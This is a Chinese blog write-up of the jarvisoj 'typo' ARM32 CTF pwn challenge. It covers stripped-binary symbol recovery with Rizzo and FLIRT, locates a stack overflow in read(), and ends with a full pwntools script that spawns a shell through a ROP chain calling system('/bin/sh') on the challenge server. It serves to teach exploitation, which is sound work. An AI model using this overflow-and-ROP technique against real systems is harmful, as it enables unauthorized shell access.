BUU刷题-Pwn-jarvisoj_typo(ARM符号表恢复技术,Rizzo,FLIRT)

于 2024-10-08 10:32:21 发布
阅读量1.3k 收藏 9
点赞数 35
分类专栏: BUU_pwn解题wp ARM_PWN 文章标签: arm开发 ctf pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65474192/article/details/142753468
版权

解题所涉知识点:

泄露或修改内存数据:

  1. 堆地址:
  2. 栈地址:
  3. libc地址:
  4. BSS段地址:
    劫持程序执行流程:ARM_ROP
    获得shell或flag:调用程序中的system

题目类型:
ARM_Pwn arm32
无符号表Pwn

相关知识点:

IDA插件Rizzo
IDA的FLIRT工具的使用
ROPgadget的使用
IDA远程调试异架构程序

题目信息:
┌──(kali㉿kali)-[~/…/Pwn/BUU/ARM/jarvisoj_typo]
└─$ checksec --file=typo 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified   Fortifiable     FILE
Full RELRO      No canary found   NX enabled    No PIE          N/A        N/A          No Symbols      N/A     0  0typo
                                                                                                                    
┌──(kali㉿kali)-[~/…/Pwn/BUU/ARM/jarvisoj_typo]
└─$ file typo   
typo: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=211877f58b5a0e8774b8a3a72c83890f8cd38e63, stripped

libc版本:
wp借鉴:ARM架构下的 buffer overflow 初探_arm架构下的buffer-CSDN博客
arm-pwn入门 丨 tw11ty’s Blog (tweety-blog.cn)
关于学习arm架构下的pwn的总结 - ZikH26 - 博客园 (cnblogs.com)
通过一道ARM PWN题引发的思考:jarvisOJ_typo_jarvisoj环境搭建-CSDN博客
arm-pwn 学习 · De4dCr0w’s Blog

信息收集

运行后分析程序行为:


在输入回车后就可以开始进行多次交互了!

核心伪代码分析:

由于没有符号表的存在所以只能先从start函数起步:

存在利用的的代码:

// positive sp value has been detected, the output may be wrong!
void __noreturn start(int a1, int a2, int a3, int a4, ...)
{
  int v4; // r0
  va_list va; // [sp+0h] [bp+0h] BYREF

  va_start(va, a4);
  v4 = (sub_9EBC)(sub_8F00, va, sub_A5EC, sub_A68C, a1, va);
  (sub_F0E0)(v4);
}

发现这个结构就类似于__libc_start_main()函数,我们就可以由此找到main函数了,或者根据前面的字符串来寻找主函数的位置!


找到主函数:

int __fastcall sub_8F00(int a1, int a2)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v17 = 0;
  v16 = 0;
  sub_11D04(off_A1538, 0, 2, 0, a2, a1);
  sub_11D04(off_A1534[0], 0, 2, 0, v9, v10);
  v2 = sub_22240(1, "Let's Do Some Typing Exercise~\nPress Enter to get start;\nInput ~ if you want to quit\n", 'V');
  if ( sub_12170(v2) != 10 )
    sub_FBD4(-1);
  sub_22240(1, "------Begin------", 17);
  v3 = sub_214CC(0);
  v4 = sub_FE28(v3);
  v15 = sub_21474(v4);
  do
  {
    ++v17;
    v14 = sub_10568() % 4504;
    sub_11338("\n%s\n", &aAbandon[20 * v14]);
    v5 = sub_8D24(&aAbandon[20 * v14]);
    v13 = v5;
    if ( !v5 )
    {
      v5 = sub_11AC0("E.r.r.o.r.");
      ++v16;
    }
  }
  while ( v13 != 2 );
  v12 = sub_21474(v5);
  v6 = sub_9428(v12 - v15);
  v11 = sub_9770(v6, HIDWORD(v6), 0, 1093567616);
  sub_22240(1, "------END------", 15);
  sub_11F80(10);
  sub_8DF0(v17 - 1, v16, v11, HIDWORD(v11));
  sub_11AC0("Bye");
  return v7;
}

我们可以根据动态调试分析出哪些函数是输入,当我们调试时如果程序陷入等待的话就代表这个函数是一个输入函数!

使用IDA的符号表恢复技术:
IDA的Rizzo插件:

项目:

这里又很多arm文件:[原创] CTF 中 ARM & AArch64 架构下的 Pwn-Pwn-看雪-安全社区|安全招聘|kanxue.com

恢复符号表的尝试Rizzo:

使用Rizzo匹配armlibc2.39的符号表匹配出的函数比较多!

发现armlibc2.26匹配的也比较多!

IDA的FLIRT功能:

存储的libc的sig文件:
sig-database/ubuntu/libc6/10.10 (maverick) at master · push0ebp/sig-database (github.com)

教程:

SDK工具下载:

制作sig文件:
ELF64文件逆向分析知识—[2]制作静态库SIG_flair制作sigs-CSDN博客
IDA 高级功能使用 之 制作signature —— 识别库函数 - thinkycx.me

IDA的FLIRT恢复符号表,恢复的效果不明显:

发现虽然都又符号被恢复但是sytem函数并未被恢复,所以最后直接使用了这里的idb:ctf-challenges/pwn/arm/jarvisOJ_typo/typo.idb at master · ctf-wiki/ctf-challenges (github.com)
导出riz文件,恢复符号表,所以符号表不要期望恢复太多!

加上函数分析:

  sub_22240(1, "Let's Do Some Typing Exercise~\nPress Enter to get start;\nInput ~ if you want to quit\n", 'V', v2);
...
  sub_22240(1, "------Begin------", 0x11, 0xA);

这两个函数就是输出函数然后三个参数和write函数很匹配!
进入内部去看:

void __fastcall sub_22240(void *a1, void *a2, void *a3, void *a4)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  if ( dword_A3094 )
  {
    v7 = sub_23ED8();
    v8 = linux_eabi_syscall(4, a1, a2, a3, a4, v4, v5, v6);
    sub_23F98(v7);
    if ( v8 >= 0xFFFFF000 )
      goto LABEL_5;
  }
  else if ( linux_eabi_syscall(4, a1, a2, a3, a4, v4, v5, v6) >= 0xFFFFF000 )
  {
LABEL_5:
    JUMPOUT(0xFFFF0FE0);
  }
}

也可以发现linux_eabi_syscall这个函数,代表这个函数属于系统调用:linux_eabi_syscall系统调用编号表 - 简书 (jianshu.com)
更加确定了它write的身份!

...
    sub_11338("\n%s\n", &aAbandon[20 * v12]);
...

发现这个参数里面又格式化字符串,大概率就是printf函数了!

int sub_11338(const char *a1, ...)
{
  va_list varg_r1; // [sp+14h] [bp-Ch] BYREF

  va_start(varg_r1, a1);
  return sub_32F84(off_A1534[0], a1, varg_r1);
}

这个函数的结构就是printf了!

然后我将这些猜测的数据丢给gpt后几乎就生成了正确的函数名:

这是c语言伪代码,你可以大胆的修改为合适的函数名不要怕错误,我只是参考一下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  idx = 0;
  v15 = 0;
  sub_11D04(stdin, 0, 2, 0);
  sub_11D04(stdio[0], 0, 2, 0);
  write(1, "Let's Do Some Typing Exercise~\nPress Enter to get start;\nInput ~ if you want to quit\n", 'V', v3);
  if ( sub_12170() != '\n' )
    sub_FBD4(-1);
  write(1, "------Begin------", 0x11, '\n');
  v4 = time_0(0);
  sub_FE28(v4);
  v5 = sub_21474();
  v14 = v5;
  do
  {
    ++idx;
    num = setutxent_0(v5, v6) % 0x1198;
    printf("\n%s\n", &aAbandon[20 * num]);
    v5 = sub_8D24(&aAbandon[20 * num]);
    v12 = v5;
    if ( !v5 )
    {
      v5 = sub_11AC0("E.r.r.o.r.");
      ++v15;
    }
  }
  while ( v12 != 2 );
  v11 = sub_21474();
  v7 = sub_9428(v11 - v14);
  v10 = sub_9770(v7, HIDWORD(v7), 0, 1093567616);
  write(1, "------END------", 0xF, v10);
  sub_11F80(10);
  sub_8DF0(idx - 1, v15, v10, SHIDWORD(v10));
  sub_11AC0("Bye");
  return v8;
}

GPT的回答:
好的,我会根据你的代码提供一些合理的命名修改,让代码更加易读和清晰。以下是修改后的版本:

#include <stdio.h>
#include <time.h>
#include <unistd.h>

// 假设这些是你在程序其他地方定义的函数
void initialize_stream(FILE *stream, int arg1, int arg2, int arg3);
void error_exit(int code);
int get_input();
void process_time(time_t time_value);
int generate_random_value();
int calculate_result(const char *input);
int display_error_message(const char *message);
int compute_difference(int value);
float calculate_score(int diff, int arg1, int arg2, float base);
void display_statistics(int completed, int errors, float score);

int main(int argc, const char **argv, const char **envp)
{
    int idx = 0;
    int error_count = 0;
    int random_value, start_time, end_time;
    int result, time_diff;
    float score;
    
    initialize_stream(stdin, 0, 2, 0);
    initialize_stream(stdout, 0, 2, 0);
    
    write(1, "Let's Do Some Typing Exercise~\nPress Enter to get started;\nInput ~ if you want to quit\n", 81);
    
    if (get_input() != '\n')
        error_exit(-1);

    write(1, "------Begin------\n", 17);
    
    start_time = time(0);
    process_time(start_time);
    
    random_value = generate_random_value();
    int initial_random_value = random_value;

    do
    {
        idx++;
        int num = random_value % 4504; // 假设0x1198等于十进制的4504
        printf("\n%s\n", &aAbandon[20 * num]);
        
        result = calculate_result(&aAbandon[20 * num]);
        
        if (!result)
        {
            result = display_error_message("E.r.r.o.r.");
            error_count++;
        }
    }
    while (result != 2);
    
    end_time = generate_random_value();
    time_diff = compute_difference(end_time - initial_random_value);
    score = calculate_score(time_diff, 0, 0, 1093567616.0);

    write(1, "------END------\n", 15);
    
    sleep(10); // 模拟等待
    display_statistics(idx - 1, error_count, score);
    
    display_error_message("Bye");

    return 0;
}

根据GPT生成的代码继续验证!如果手动去找漏洞的话还是比较复杂的所以直接手动实现!

直接把函数丢给gpt让它猜代码,这个函数大胆猜测一下这是什么函数他是C语言库里的:

找到目标函数漏洞:

int __fastcall calculate_result(unsigned __int8 *randstr)
{
  unsigned int len; // r0
  int len_1; // r4
  int input[28]; // [sp+Ch] [bp-70h] BYREF

  memset_0(input, 0, 0x64u);
  read(0, input, &unk_200, input);              // 存在溢出
  len = strlen_0(randstr);                      // a1是传入进来的字符串
  if ( !memcmp(randstr, input, len) )           // 字符串对比
  {
    len_1 = strlen_0(randstr);
    if ( len_1 == strlen_0(input) - 1 )
      return 1;
  }
  if ( LOBYTE(input[0]) == '~' )                // 如果
    return 2;
  return 0;
}

存在溢出!

分析:

通过IDA动态调试锁定输入函数并且识别出read函数存在溢出漏洞!

.text:00008D4C SUB     R3, R11, #-input
.text:00008D50 MOV     R0, #0
.text:00008D54 MOV     R1, R3
.text:00008D58 MOV     R2, #0x200
.text:00008D5C BL      read

开始动态调试确定溢出长度!成功确定出溢出长度为112.

Gadgets获取:

获取gadgets:

┌──(kali㉿kali)-[~//Pwn/BUU/ARM/jarvisoj_typo]
└─$ ROPgadget --binary typo --only "pop"
Gadgets information
============================================================
0x00008d1c : pop {fp, pc}
0x00020904 : pop {r0, r4, pc}
0x00068bec : pop {r1, pc}
0x00008160 : pop {r3, pc}
0x0000ab0c : pop {r3, r4, r5, pc}
0x0000a958 : pop {r3, r4, r5, r6, r7, pc}
0x00008a3c : pop {r3, r4, r5, r6, r7, r8, fp, pc}
0x0000a678 : pop {r3, r4, r5, r6, r7, r8, sb, pc}
0x00008520 : pop {r3, r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x00068c68 : pop {r3, r4, r5, r6, r7, r8, sl, pc}
0x00014a70 : pop {r3, r4, r7, pc}
0x00008de8 : pop {r4, fp, pc}
0x000083b0 : pop {r4, pc}
0x00008eec : pop {r4, r5, fp, pc}
0x00009284 : pop {r4, r5, pc}
0x000242e0 : pop {r4, r5, r6, fp, pc}
0x000095b8 : pop {r4, r5, r6, pc}
0x000212ec : pop {r4, r5, r6, r7, fp, pc}
0x000082e8 : pop {r4, r5, r6, r7, pc}
0x00043110 : pop {r4, r5, r6, r7, r8, fp, pc}
0x00011648 : pop {r4, r5, r6, r7, r8, pc}
0x00048e9c : pop {r4, r5, r6, r7, r8, sb, fp, pc}
0x0000a5a0 : pop {r4, r5, r6, r7, r8, sb, pc}
0x0000870c : pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x00011c24 : pop {r4, r5, r6, r7, r8, sb, sl, pc}
0x000553cc : pop {r4, r5, r6, r7, r8, sl, pc}
0x00023ed4 : pop {r4, r5, r7, pc}
0x00023dbc : pop {r4, r7, pc}
0x00014068 : pop {r7, pc}

Unique gadgets found: 29

发现这个gadget正好可以传参和调用system函数:0x00020904 : pop {r0, r4, pc}

获取/bin/sh

┌──(kali㉿kali)-[~/…/Pwn/BUU/ARM/jarvisoj_typo]
└─$ ROPgadget --binary typo --string "bin/sh"
Strings information
============================================================
0x0006c385 : bin/sh

这个函数是system:

int __fastcall sub_110B4(int a1)
{
  if ( a1 )
    return sub_10BA8(a1);
  else
    return sub_10BA8("exit 0") == 0;
}

地址是:

.text:000110B4 00 00 50 E3                   CMP     R0, #0
.text:000110B8 00 00 00 0A                   BEQ     loc_110C0
.text:000110B8
.text:000110BC B9 FE FF EA                   B       sub_10BA8

攻击思路总结

通过IDA动态调试和符号表恢复找到目标函数,存在read函数溢出
再通过pwndbg来计算栈溢出的长度是112
再通过RopGadgets找到gadget,用来传参和调用函数
由于是静态程序就一定会存在很多字符串和system函数找到地址然后就是利用了!

脚本:
import argparse
from pwn import *
from LibcSearcher import *

# Parse command-line arguments
parser = argparse.ArgumentParser(description='Exploit script.')
parser.add_argument('-r', action='store_true', help='Run exploit remotely.')
parser.add_argument('-d', action='store_true', help='Run exploit in debug mode.')
args = parser.parse_args()

pwnfile = './typo'
elf = ELF(pwnfile)
context(log_level='debug', arch=elf.arch, os='linux')

is_remote = args.r
is_debug = args.d

if is_remote:
    sh = remote('node5.buuoj.cn', 26456)
else:
    if is_debug:
        sh = process(["qemu-arm", "-g", "1234", pwnfile])
    else:
        sh = process(["qemu-arm", pwnfile])

def mygdb():
    if not is_remote and is_debug:
        gdb.attach(sh, """target remote localhost:1234
        		b *0x8DE8
        		""")  # brva 0xe93 b *0x4008c0
mygdb()
offset=112
pop_r0_r4_pc_addr=0x00020904
bin_sh_addr=0x0006c384
sys_addr=0x00010BA8
sh.send('\n')
payload=offset*b'a'+p32(pop_r0_r4_pc_addr)+p32(bin_sh_addr)+p32(0)+p32(sys_addr)
sh.sendline(payload)
sh.interactive()
Brinmon
关注
专栏目录
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 715
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 390
Buu CTF PWNjarvisoj_level0的WriteUp
jarvisoj_typo
z1r0的博客
03-17 442
jarvisoj_typo 查看保护 arm程序,这一类的环境的话可以去网上找找怎么安装,qemu,gdb-multiarch,等 等 32位,静态链接,去了符号表信息攻击思路:因为去了符号表信息,进了ida之后基本看不出程序功能 这里笔者直接手动fuzz了一下发现有栈溢出漏洞 保护没有开canary和pie,所以考虑rop了。 劫持程序控制流执行system("/bin/sh");找一下/bin/sh 看了一下引用,跟进10bab 这个函数和do_system()很相似,暂且先认为它是syste
[Jarvis OJ - PWN]——Typo(内涵peak小知识)
Y_peak的博客
02-17 351
[Jarvis OJ - PWN]——Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构。还是第一次遇到。 peak小知识 和x86架构不同, arm架构arm 下的函数调用规定, 函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 ei
南阳理工学院OJ_个人AC代码包(Java提交)
07-24
南阳理工学院OJ_个人AC代码包(Java提交) 是Java初学者登堂入室的很好例子。
[pwn&re]使用IDA flair恢复静态编译去符号的库函数名
热门推荐
Breeze的博客
12-31 1万+
使用IDA恢复去符号的库函数名 文章目录使用IDA恢复去符号的库函数名IDA flair自己制作签名文件自动检测脚本 在一些时候经常遇到静态编译并且去符号的题目,打开的画风就是这样的: 和这样的: 虽然说我们也可以根据参数的类型或者参数的数量手动分析出原函数的名字或功能,但无论如何也太麻烦了,再者有的时候还会有一些其他的干扰,那更会加大分析难度,这里提供一个简单的还原库函数名称的IDA功能:f...
go pwn 2017 SECCON - Baby Stack
yongbaoii的博客
04-09 1264
要用ida7.6来恢复一些它的符号表 不然还得用像go_parser的一些工具。
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1022
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2460
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1527
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
2022 虎符 pwn hfdev(三)
yongbaoii的博客
03-30 822
终于说到了解题
PowerPC&ARM架构下的pwn 初探
S4n_v1的博客
04-13 933
PowerPC&ARM&AARCH64 架构学习(Ubuntu16 + 运行环境搭建 + 调试 + 指令集 + 赛题复现 2023 数字中国创新大赛 数字网络安全人才挑战赛 - pwn起源 buu - jarvisoj_typo
jarvis oj typo
发蝴蝶和大脑斧的博客
06-04 741
m4x的–如何pwn掉一个arm binary arm 的参数 1 ~ 4 分别保存到 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡, 返回值存放在 r0中 by the way, arm 的 pc 指针相当于 eip/rip, b/bl 等指令实现了跳转 ...
arm ida 伪代码 安卓 符号表_iOS符号表恢复&逆向支付宝
weixin_32427471的博客
01-26 408
推荐序本文介绍了恢复符号表的技巧,并且利用该技巧实现了在 Xcode 中对目标程序下符号断点调试,该技巧可以显著地减少逆向分析时间。在文章的***,作者以支付宝为例,展示出通过在 UIAlertView 的 show 方法处下断点,从而获得支付宝的调用栈的过程。本文涉及的代码也开源在:https://github.com/tobefuturer/restore-symbol,欢迎 Star 和...
PWN学习,对CTF-wiki上的讲解进行一些补充
qq_33948522的博客
06-27 5767
`基本知识 ROP Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 一般的栈结构: 高地址 +-----------------+ ...
ida pro恢复去符号程序的符号
NoOneGroup
01-08 3401
ida pro恢复去符号程序的符号 新博客链接 序言 第一部分说的都是废话吧,对我来说,建议用后面部分的 恢复方法 lscanf 首先获得sig,我这里用的是lscanf里的sig 下载地址 先扫描下 python lscan.py -f stripped -S amd64/sig/ amd64/sig/libc-2.13.sig 12266/3369 (364.08%) amd64/sig/li...
看雪pwn入门--基础篇
泣当歌的计算机小白之路
03-28 2714
1.pwn理论基础  小菜: 什么是溢出 概念:在计算机中,当要表示的数据超出计算机使用的数据表示范围时,产生数据的溢出 原因:使用非类型安全的语言入C/C++等            以不可靠的方式存取或者复制内存缓冲区            编译器设置内存缓冲区太靠近关键数据结
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值